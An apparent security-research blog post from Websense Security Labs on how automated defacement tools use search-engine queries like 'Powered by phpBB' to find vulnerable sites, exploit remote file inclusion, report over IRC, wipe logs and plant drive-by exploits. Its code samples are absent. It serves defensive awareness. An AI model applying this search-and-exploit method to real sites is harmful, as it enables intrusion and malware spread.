Blog

The question is: how do they find Web applications that are vulnerable to such attacks? The answer is: by using the search engines on the Internet to do the legwork. This is not a new technique, but lately we've seen this incorporated in malicious scripts and malware.

This week, I examine some of the automated tools used for Web site defacements, where the key element in the operation is the use of a search engine.

Search Engine + IRC = True

This first example shows how a malicious script uses Google for its mining process. Other search engines are commonly used as well.

The process starts with a script that goes onto the Google site and injects known Google parameters to discover Web servers that contain specific Web applications.

The script above targets phpBB and looks for that specific Web application by searching for “Powered by phpBB”. PhpBB is an extremely popular open source bulletin board introduced in 2000. Vulnerabilities uncovered throughout its development are actively being exploited in the wild.

If a host is discovered, the script tries to execute a list of exploits designed for that Web application. All of this is done to find parameters within the application that are vulnerable to remote file inclusion. If the attack is successful, the script sends commands to a remote IRC server, notifying the attacker that a vulnerable host has been found.

The attacker now uses that information to inject a remote shell. The code is then parsed and executed, giving the invader full control over the Web server.

Actions

After a vulnerable host is found through a search engine, the attacker can inject scripting code through the vulnerable parameter. Here is an example of a script that is often injected:

The script goes through the server's entire folder structure, mapping out the existing files. It locates the main Web page and defaces it. After that's done, it uses the information gathered in the first step and deletes all log and system files to erase any trace of the defacement.

From fun to profit

In the past, defacing was often done for fun and to show off. Even though large corporate Web sites were defaced, the victims simply had to fix the defaced page, and they would be back online again.

Some of our latest research shows that it's no longer so innocent, because attackers embed Web exploits in the defaced Web page. Even though a corporation can fix the problem fairly quickly, thousands of computers may already be infected. One example is this defaced Web site:

This site looks like any other defaced Web site you may have encountered. But the difference is significant: it is spreading malware. By looking at the source code of the Web page, we can see that it's up to no good.

The first thing we notice is the encoded JavaScript:

After decoding the script, we see that it's trying to use the MS06-014 vulnerability to download an executable file to the victim's computer.

Look what I have done!

Most of the people behind these defacements report their accomplishment to the online defacement archive, Zone-H.org. We've even found customized software created by attackers so that they can add a vast amount of URLs in one submission.

Conclusion

It's clear that search engines are a key element in the mining and information-gathering process. The increase in published scripts and tools for Web site defacement is a good indication of this. It is also a reminder that everyone is a potential target, not only large corporations.

It's ironic that the malicious tools and scripts in this blog were all found through search engines. Even though the attackers know how to exploit functionality in search engines to the fullest, that doesn't necessarily mean that they keep themselves away from a search engine's prying eyes.

Researcher: Preben Nylokken, Websense Security Labs